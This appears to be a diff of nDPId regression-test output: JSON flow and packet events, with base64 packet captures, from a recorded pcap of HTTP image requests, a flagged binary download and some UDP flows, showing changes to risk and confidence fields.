+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 02159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\/+YwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozOCBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY4MDQ1Mw0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDINClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hlUfxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"}
 02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsLG1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0cjf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"}
 00740{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00778{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="}
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"Unknown","breed":"Unrated","category":"Download"}}
+00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}}
 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLXL+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Ktlu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"}
 02161{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vyCP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEfGu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRygtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4XaV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11":"HTTP Suspicious User-Agent"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00817{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
